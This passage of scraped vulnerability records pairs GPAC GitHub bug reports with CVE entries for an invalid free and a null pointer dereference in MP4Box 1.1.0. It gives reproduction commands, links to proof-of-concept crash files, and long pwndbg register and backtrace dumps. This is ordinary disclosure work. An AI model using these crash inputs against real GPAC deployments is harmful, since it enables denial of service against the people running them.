gf_sm_del+195 f 2 0x555555584423 dump_isom_scene+627 f 3 0x55555557b42c mp4boxMain+9228 f 4 0x7ffff75630b3 __libc_start_main+243 ───────────────────────────────────────────────────────────────────────────────────────── pwndbg> free(): invalid pointer Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x0 *RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 *RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] *RDX 0x0 *RDI 0x2 *RSI 0x7fffffff6f20 ◂— 0x0 *R8 0x0 *R9 0x7fffffff6f20 ◂— 0x0 *R10 0x8 *R11 0x246 *R12 0x7fffffff7190 ◂— 0x0 *R13 0x10 *R14 0x7ffff7ffb000 ◂— 0x6565726600001000 *R15 0x1 *RBP 0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0 *RSP 0x7fffffff6f20 ◂— 0x0 *RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ───────────────────────────────────────[ DISASM ]──────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ────────────────────────────────────────[ STACK ]──────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0 01:0008│ 0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */ 02:0010│ 0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0 03:0018│ 0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 04:0020│ 0x7fffffff6f40 ◂— 0x0 05:0028│ 0x7fffffff6f48 ◂— 0x0 06:0030│ 0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0 07:0038│ 0x7fffffff6f58 ◂— 0x0 ──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff75d447c f 4 0x7ffff75d5cac _int_free+748 f 5 0x7ffff784f461 gf_sg_command_del+353 f 6 0x7ffff7a88203 gf_sm_del+195 f 7 0x555555584423 dump_isom_scene+627 ```

Invalid free in gf_sg_command_del()

https://api.github.com/repos/gpac/gpac/issues/1980/comments

2021-12-11T09:14:52Z

2021-12-13T13:22:09Z

https://github.com/gpac/gpac/issues/1980

CVE-2021-45263

2021-12-22T18:15:08.180

An invalid free vulnerability exists in gpac 1.1.0 via the gf_svg_delete_attribute_value function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1975

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid free was discovered in gf_svg_delete_attribute_value(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr ./poc/poc_12 ``` [poc_12.zip](https://github.com/gpac/gpac/files/7696155/poc_12.zip) **Result** ``` ./MP4Box -lsr ./poc/poc_12 [iso file] Box "stco" (start 2057) has 6144 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 1814 (start 415) invalid (read 7894) [iso file] Unknown box type 00040000 in parent dref [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Incomplete box mdat - start 11495 size 803523 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Box "stco" (start 2057) has 6144 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 1814 (start 415) invalid (read 7894) [iso file] Unknown box type 00040000 in parent dref [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Incomplete box mdat - start 11495 size 803523 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [MP4 Loading] Unable to fetch sample 1 from track ID 7 - aborting track import [LASeR] sametext coded in bitstream but no text defined ! [LASeR] samerect coded in bitstream but no rect defined ! [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [LASeR] memory overread - corrupted decoding [MP4 Loading] decoding sample 1 from track ID 8 failed [1] 4148207 segmentation fault ./MP4Box -lsr ./poc/poc_12 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x4183400000000000) at malloc.c:3102 3102 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 RSP 0x7fffffff7040 ◂— 0x0 RIP 0x7ffff75d9870 (free+32) ◂— mov rax, qword ptr [rdi - 8] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff75d9870 <free+32> mov rax, qword ptr [rdi - 8] 0x7ffff75d9874 <free+36> lea rsi, [rdi - 0x10] 0x7ffff75d9878 <free+40> test al, 2 0x7ffff75d987a <free+42> jne free+96 <free+96> ↓ 0x7ffff75d98b0 <free+96> mov edx, dword ptr [rip + 0x14d9fe] <0x7ffff77272b4> 0x7ffff75d98b6 <free+102> test edx, edx 0x7ffff75d98b8 <free+104> jne free+123 <free+123> ↓ 0x7ffff75d98cb <free+123> mov rdi, rsi 0x7ffff75d98ce <free+126> add rsp, 0x18 0x7ffff75d98d2 <free+130> jmp munmap_chunk <munmap_chunk> ↓ 0x7ffff75d4630 <munmap_chunk> sub rsp, 8 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7040 ◂— 0x0 ... ↓ 2 skipped 03:0018│ 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe 04:0020│ 0x7fffffff7060 ◂— 0x0 05:0028│ 0x7fffffff7068 ◂— 0x1 06:0030│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 07:0038│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9870 free+32 f 1 0x7ffff78c805d gf_svg_delete_attribute_value+173 f 2 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 3 0x7ffff78e1b65 gf_node_delete_attributes+69 f 4 0x7ffff78c7c2a gf_svg_node_del+282 f 5 0x7ffff784a51d gf_node_unregister+349 f 6 0x7ffff784a6f4 gf_node_unregister_children+36 f 7 0x7ffff784a731 gf_sg_parent_reset+17 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __GI___libc_free (mem=0x4183400000000000) at malloc.c:3102 #1 0x00007ffff78c805d in gf_svg_delete_attribute_value () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff78c815b in gf_svg_delete_attribute_value () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff78e1b65 in gf_node_delete_attributes () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff78c7c2a in gf_svg_node_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff784a51d in gf_node_unregister () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff784a6f4 in gf_node_unregister_children () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff784a731 in gf_sg_parent_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff78c7c32 in gf_svg_node_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff784a51d in gf_node_unregister () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00007ffff784a6f4 in gf_node_unregister_children () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #11 0x00007ffff784a731 in gf_sg_parent_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #12 0x00007ffff78c7c32 in gf_svg_node_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #13 0x00007ffff784a51d in gf_node_unregister () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #14 0x00007ffff784f396 in gf_sg_command_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #15 0x00007ffff7a88203 in gf_sm_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #16 0x0000555555584423 in dump_isom_scene () #17 0x000055555557b42c in mp4boxMain () #18 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #19 0x000055555556c45e in _start () ``` `break gf_svg_delete_attribute_value` ``` 0x00007ffff78c8058 in gf_svg_delete_attribute_value () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x7ffff78c8050 (gf_svg_delete_attribute_value+160) ◂— mov rdi, qword ptr [rsi] RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 RSP 0x7fffffff7060 ◂— 0x0 *RIP 0x7ffff78c8058 (gf_svg_delete_attribute_value+168) ◂— call 0x7ffff77e2cb0 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff78c7fda <gf_svg_delete_attribute_value+42> add rax, rdx 0x7ffff78c7fdd <gf_svg_delete_attribute_value+45> jmp rax ↓ 0x7ffff78c8050 <gf_svg_delete_attribute_value+160> mov rdi, qword ptr [rsi] 0x7ffff78c8053 <gf_svg_delete_attribute_value+163> test rdi, rdi 0x7ffff78c8056 <gf_svg_delete_attribute_value+166> je gf_svg_delete_attribute_value+78 <gf_svg_delete_attribute_value+78> ► 0x7ffff78c8058 <gf_svg_delete_attribute_value+168> call gf_free@plt <gf_free@plt> rdi: 0x4183400000000000 rsi: 0x5555555dfce0 ◂— 0x4183400000000000 rdx: 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 rcx: 0x0 0x7ffff78c805d <gf_svg_delete_attribute_value+173> jmp gf_svg_delete_attribute_value+78 <gf_svg_delete_attribute_value+78> 0x7ffff78c805f <gf_svg_delete_attribute_value+175> nop 0x7ffff78c8060 <gf_svg_delete_attribute_value+176> mov r14, qword ptr [rsi] 0x7ffff78c8063 <gf_svg_delete_attribute_value+179> xor ebx, ebx 0x7ffff78c8065 <gf_svg_delete_attribute_value+181> mov rdi, r14 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7060 ◂— 0x0 01:0008│ 0x7fffffff7068 ◂— 0x1 02:0010│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 03:0018│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 04:0020│ 0x7fffffff7080 ◂— 0x2a /* '*' */ 05:0028│ 0x7fffffff7088 ◂— 0x8 06:0030│ 0x7fffffff7090 —▸ 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 07:0038│ 0x7fffffff7098 —▸ 0x7ffff78c815b (gf_svg_delete_attribute_value+427) ◂— cmp r14d, ebx ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78c8058 gf_svg_delete_attribute_value+168 f 1 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 2 0x7ffff78e1b65 gf_node_delete_attributes+69 f 3 0x7ffff78c7c2a gf_svg_node_del+282 f 4 0x7ffff784a51d gf_node_unregister+349 f 5 0x7ffff784a6f4 gf_node_unregister_children+36 f 6 0x7ffff784a731 gf_sg_parent_reset+17 f 7 0x7ffff78c7c32 gf_svg_node_del+290 ────────────────────────────────────────────────────────────────────────────────────────────────────── __GI___libc_free (mem=0x4183400000000000) at malloc.c:3087 3087 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x7ffff78c8050 (gf_svg_delete_attribute_value+160) ◂— mov rdi, qword ptr [rsi] RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 RSP 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe *RIP 0x7ffff75d9850 (free) ◂— endbr64 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff77e2cb4 <gf_free@plt+4> bnd jmp qword ptr [rip + 0x7bc045] <gf_free> ↓ 0x7ffff77f9f30 <gf_free> endbr64 0x7ffff77f9f34 <gf_free+4> jmp free@plt <free@plt> ↓ 0x7ffff77e2840 <free@plt> endbr64 0x7ffff77e2844 <free@plt+4> bnd jmp qword ptr [rip + 0x7bc27d] <free> ↓ ► 0x7ffff75d9850 <free> endbr64 0x7ffff75d9854 <free+4> sub rsp, 0x18 0x7ffff75d9858 <free+8> mov rax, qword ptr [rip + 0x14d699] 0x7ffff75d985f <free+15> mov rax, qword ptr [rax] 0x7ffff75d9862 <free+18> test rax, rax 0x7ffff75d9865 <free+21> jne free+152 <free+152> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe 01:0008│ 0x7fffffff7060 ◂— 0x0 02:0010│ 0x7fffffff7068 ◂— 0x1 03:0018│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 04:0020│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 05:0028│ 0x7fffffff7080 ◂— 0x2a /* '*' */ 06:0030│ 0x7fffffff7088 ◂— 0x8 07:0038│ 0x7fffffff7090 —▸ 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9850 free f 1 0x7ffff78c805d gf_svg_delete_attribute_value+173 f 2 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 3 0x7ffff78e1b65 gf_node_delete_attributes+69 f 4 0x7ffff78c7c2a gf_svg_node_del+282 f 5 0x7ffff784a51d gf_node_unregister+349 f 6 0x7ffff784a6f4 gf_node_unregister_children+36 f 7 0x7ffff784a731 gf_sg_parent_reset+17 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> c Continuing. Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x4183400000000000) at malloc.c:3102 3102 in malloc.c LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── *RAX 0x0 RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 *RSP 0x7fffffff7040 ◂— 0x0 *RIP 0x7ffff75d9870 (free+32) ◂— mov rax, qword ptr [rdi - 8] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff75d9870 <free+32> mov rax, qword ptr [rdi - 8] 0x7ffff75d9874 <free+36> lea rsi, [rdi - 0x10] 0x7ffff75d9878 <free+40> test al, 2 0x7ffff75d987a <free+42> jne free+96 <free+96> ↓ 0x7ffff75d98b0 <free+96> mov edx, dword ptr [rip + 0x14d9fe] <0x7ffff77272b4> 0x7ffff75d98b6 <free+102> test edx, edx 0x7ffff75d98b8 <free+104> jne free+123 <free+123> ↓ 0x7ffff75d98cb <free+123> mov rdi, rsi 0x7ffff75d98ce <free+126> add rsp, 0x18 0x7ffff75d98d2 <free+130> jmp munmap_chunk <munmap_chunk> ↓ 0x7ffff75d4630 <munmap_chunk> sub rsp, 8 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7040 ◂— 0x0 ... ↓ 2 skipped 03:0018│ 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe 04:0020│ 0x7fffffff7060 ◂— 0x0 05:0028│ 0x7fffffff7068 ◂— 0x1 06:0030│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 07:0038│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9870 free+32 f 1 0x7ffff78c805d gf_svg_delete_attribute_value+173 f 2 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 3 0x7ffff78e1b65 gf_node_delete_attributes+69 f 4 0x7ffff78c7c2a gf_svg_node_del+282 f 5 0x7ffff784a51d gf_node_unregister+349 f 6 0x7ffff784a6f4 gf_node_unregister_children+36 f 7 0x7ffff784a731 gf_sg_parent_reset+17 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> ```

Invalid free in gf_svg_delete_attribute_value()

https://api.github.com/repos/gpac/gpac/issues/1975/comments

2021-12-11T01:07:09Z

2021-12-13T13:22:08Z

https://github.com/gpac/gpac/issues/1975

CVE-2021-45266

2021-12-22T18:15:08.220

A null pointer dereference vulnerability exists in gpac 1.1.0 via the lsr_read_anim_values_ex function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1985

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in lsr_read_anim_values_ex(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/root/fuck_bin/gpac/test Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ``` [lsr_read_anim_values_ex.part-lsr_read_animateTransform.zip](https://github.com/gpac/gpac/files/7708233/lsr_read_anim_values_ex.part-lsr_read_animateTransform.zip) **Result** lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si g:11,src:004575+004803,op:splice,rep:2 ``` ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si g:11,src:004575+004803,op:splice,rep:2 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [1] 1634950 segmentation fault ../../test/lib/MP4Box -bt ``` **gdb** lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si g:11,src:004575+004803,op:splice,rep:2 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5 RCX 0x5555555c6010 ◂— 0x70006 RDX 0x6 RDI 0x5555556e4020 ◂— 0x0 RSI 0x1 R8 0x5555556e4000 ◂— 0x0 R9 0x0 R10 0x7ffff7759e4a ◂— 'gf_list_insert' R11 0x206 R12 0x5555555e1020 ◂— 0x54 /* 'T' */ R13 0x5555556e4000 ◂— 0x0 R14 0x5555555e35c0 —▸ 0x5555555e3630 ◂— 0x0 R15 0x5555556e4020 ◂— 0x0 RBP 0x3 RSP 0x7fffffff6c90 ◂— 0xf00000003 RIP 0x7ffff7b551a6 (lsr_read_anim_values_ex.part+1078) ◂— movss xmm0, dword ptr [rax] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7b551a6 <lsr_read_anim_values_ex.part+1078> movss xmm0, dword ptr [rax] 0x7ffff7b551aa <lsr_read_anim_values_ex.part+1082> movss dword ptr [r13 + 8], xmm0 0x7ffff7b551b0 <lsr_read_anim_values_ex.part+1088> call gf_list_get@plt <gf_list_get@plt> 0x7ffff7b551b5 <lsr_read_anim_values_ex.part+1093> test rax, rax 0x7ffff7b551b8 <lsr_read_anim_values_ex.part+1096> je lsr_read_anim_values_ex.part+1108 <lsr_read_anim_values_ex.part+1108> 0x7ffff7b551ba <lsr_read_anim_values_ex.part+1098> movss xmm0, dword ptr [rax] 0x7ffff7b551be <lsr_read_anim_values_ex.part+1102> movss dword ptr [r13], xmm0 0x7ffff7b551c4 <lsr_read_anim_values_ex.part+1108> mov esi, 2 0x7ffff7b551c9 <lsr_read_anim_values_ex.part+1113> mov rdi, r15 0x7ffff7b551cc <lsr_read_anim_values_ex.part+1116> call gf_list_get@plt <gf_list_get@plt> 0x7ffff7b551d1 <lsr_read_anim_values_ex.part+1121> test rax, rax ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6c90 ◂— 0xf00000003 01:0008│ 0x7fffffff6c98 ◂— 0x7fff00000008 02:0010│ 0x7fffffff6ca0 ◂— 0x350000006e /* 'n' */ 03:0018│ 0x7fffffff6ca8 —▸ 0x5555555e1020 ◂— 0x54 /* 'T' */ 04:0020│ 0x7fffffff6cb0 ◂— 0x0 05:0028│ 0x7fffffff6cb8 —▸ 0x5555555e0f00 —▸ 0x5555555e0f20 —▸ 0x5555555e0f60 —▸ 0x5555555e0f40 ◂— ... 06:0030│ 0x7fffffff6cc0 ◂— 0x0 07:0038│ 0x7fffffff6cc8 ◂— 0x2748627e3b91600 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7b551a6 lsr_read_anim_values_ex.part+1078 f 1 0x7ffff7b5d9e8 lsr_read_animateTransform+424 f 2 0x7ffff7b5beeb lsr_read_scene_content_model+1547 f 3 0x7ffff7b5c89c lsr_read_group_content.part+316 f 4 0x7ffff7b60a76 lsr_read_svg+838 f 5 0x7ffff7b58817 lsr_read_command_list+759 f 6 0x7ffff7b5ab74 lsr_decode_laser_unit+708 f 7 0x7ffff7b6239d gf_laser_decode_command_list+333 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #1 0x00007ffff7b5d9e8 in lsr_read_animateTransform () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #2 0x00007ffff7b5beeb in lsr_read_scene_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #3 0x00007ffff7b5c89c in lsr_read_group_content.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #4 0x00007ffff7b60a76 in lsr_read_svg () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #5 0x00007ffff7b58817 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #6 0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #7 0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #8 0x00007ffff7aa3061 in gf_sm_load_run_isom () from 